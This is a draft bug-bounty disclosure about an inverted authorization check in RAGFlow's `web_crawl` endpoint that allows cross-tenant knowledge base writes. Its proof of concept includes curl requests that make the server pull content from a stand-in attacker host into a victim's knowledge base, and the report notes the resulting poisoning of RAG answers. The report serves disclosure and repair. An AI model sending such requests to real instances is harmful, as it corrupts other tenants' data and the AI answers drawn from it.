# Inverted Authorization Check in `web_crawl` Endpoint Allows Cross-Tenant Knowledge Base Write

## meta
platform: huntr
program: RAGFlow
asset: https://github.com/infiniflow/ragflow
date: 2026-02-12
status: DRAFT

````
Repository URL: https://github.com/infiniflow/ragflow
Package Manager: pip
Version Affected: 0.24.0
Vulnerability Type: Incorrect Authorization
CVSS:
  - Attack Vector: Network
  - Attack Complexity: Low
  - Privileges Required: Low
  - User Interaction: None
  - Scope: Unchanged
  - Confidentiality: None
  - Integrity: High
  - Availability: High
Title: Inverted authorization check in web_crawl allows cross-tenant knowledge base write
Description:

# Description

The `web_crawl` endpoint in `api/apps/document_app.py` contains an inverted authorization check at line 116. The correct pattern (used in the `upload` function at line 86) is:

    if not check_kb_team_permission(kb, current_user.id):
        return get_json_result(data=False, message="No authorization.", ...)

The `web_crawl` function is missing the `not` keyword:

    if check_kb_team_permission(kb, current_user.id):
        return get_json_result(data=False, message="No authorization.", ...)

Since `check_kb_team_permission()` returns `True` when the user IS authorized (owner or team member), this inverted logic:
- **Denies** authorized users (owner, team members)
- **Allows** unauthorized users (any other authenticated user)

After the check incorrectly passes, the function proceeds to crawl the attacker-supplied URL via `html2pdf()`, store the result in the victim's storage, insert a document record, and link it to the victim's tenant.

# Proof of Concept

## Prerequisites
- RAGFlow instance with two user accounts (attacker + victim)
- Victim has a knowledge base with known `kb_id`

## Steps

```bash
# Attacker injects document into victim's knowledge base
curl -s -X POST "http://localhost/v1/document/web_crawl" \
  -H "Authorization: Bearer ${ATTACKER_TOKEN}" \
  -F "kb_id=${VICTIM_KB_ID}" \
  -F "name=injected_document" \
  -F "url=https://attacker.example.com/malicious-content.html"
# Returns: {"code": 0, "data": true}  (should be 401)

# Legitimate owner is BLOCKED from their own KB
curl -s -X POST "http://localhost/v1/document/web_crawl" \
  -H "Authorization: Bearer ${VICTIM_TOKEN}" \
  -F "kb_id=${VICTIM_KB_ID}" \
  -F "name=legitimate_document" \
  -F "url=https://example.com/content.html"
# Returns: {"code": 401, "data": false, "message": "No authorization."}  (should succeed)

Impact: This vulnerability is capable of allowing any authenticated user to inject documents into any other user's knowledge base by exploiting an inverted authorization check. Injected documents are indexed by the RAG pipeline, enabling data poisoning of AI-generated responses. The inverted check also blocks legitimate owners from using web_crawl on their own knowledge bases.
Occurrences:
  - Permalink: https://github.com/infiniflow/ragflow/blob/bc9ed24a8503a0a5013341b63c428169c27ff280/api/apps/document_app.py#L116
    Description: Missing `not` keyword — `if check_kb_team_permission(kb, current_user.id):` denies authorized users and allows unauthorized users. Compare with correct pattern at line 86: `if not check_kb_team_permission(kb, current_user.id):`.
  - Permalink: https://github.com/infiniflow/ragflow/blob/bc9ed24a8503a0a5013341b63c428169c27ff280/api/common/check_team_permission.py#L25-L37
    Description: `check_kb_team_permission()` returns `True` for authorized users (owner or team member). The missing `not` at the call site inverts the logic.
References:
  - https://cwe.mitre.org/data/definitions/863.html — CWE-863: Incorrect Authorization
  - https://owasp.org/Top10/A01_2021-Broken_Access_Control/ — OWASP A01:2021
  - https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/ — OWASP API1:2023
````